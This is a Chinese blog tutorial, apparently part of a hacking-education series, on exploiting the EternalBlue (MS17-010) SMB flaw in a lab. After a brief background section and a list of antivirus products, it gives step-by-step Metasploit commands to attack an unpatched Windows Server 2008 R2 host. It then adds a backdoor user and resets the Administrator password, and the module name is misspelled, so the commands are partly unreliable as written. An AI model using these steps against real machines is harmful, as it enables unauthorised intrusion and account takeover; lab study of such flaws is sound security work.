【黑帽编程与攻防技术】五：利用永恒之蓝漏洞攻击计算机

大家好，这里是黑帽编程与攻防技术系列的第五篇博客，如果有侵权，请联系删除，文章不支持转载。
黑帽编程和攻防技术，主要是提升网安小白的攻防技术。包括但不限于邮箱入口攻击和防御，Windows系统漏洞攻防，引用程序攻防，Web网络攻防，漏洞挖掘。
文章主要讲解攻击技术，是因为最好的防守即时攻击，但是不得用于非法目的。造成的一切损失，本人一概不负责。

永恒之蓝漏洞

这个漏洞相信大家都听说过。永恒之蓝，英语名eternalblue，是一个基于445端口的漏洞。通过这个漏洞，我们最高可以拿到Root权限。曾经轰动世界的想哭勒索病毒，就是通过永恒之蓝漏洞入侵的。
MSF可以攻击的版本：

Windows 7各版本
Windows Server 2008 R2
Windows 8及以上部分版本

目前，微软已经发布了该漏洞的补丁，用户可以通过下载安全补丁保护电脑。同时安装杀毒软件。
目前，作者亲测的可以防护445攻击的杀毒软件有：
360卫士，火绒，卡巴斯基，金山会员版。
其他的还没试，不过有几个我试过了，但是没有抵挡：
江民杀毒，2345安全卫士。

攻击

实验环境：
一台Kali攻击电脑。
一台开启445，关闭防火墙，无杀毒软件， 无补丁的Windows Server 2008 R2

MSF攻击的实现方法：

msfconsole   启动MSF
search eterbalblue   查找相关模块
use exploit/windows/smb/ms17_010_eterbalblue 使用模块
set lhost 自己的ip
set rhost 靶机的ip
set rport 445 设置端口
exploit 开始攻击

然后就可以拿到目标靶机的CMD。

然后我们开用户

net user hacker 123456 /add

改密码

net user Administrator kafj

结束

以上就是通过永恒之蓝漏洞入侵个人PC介绍。
再见！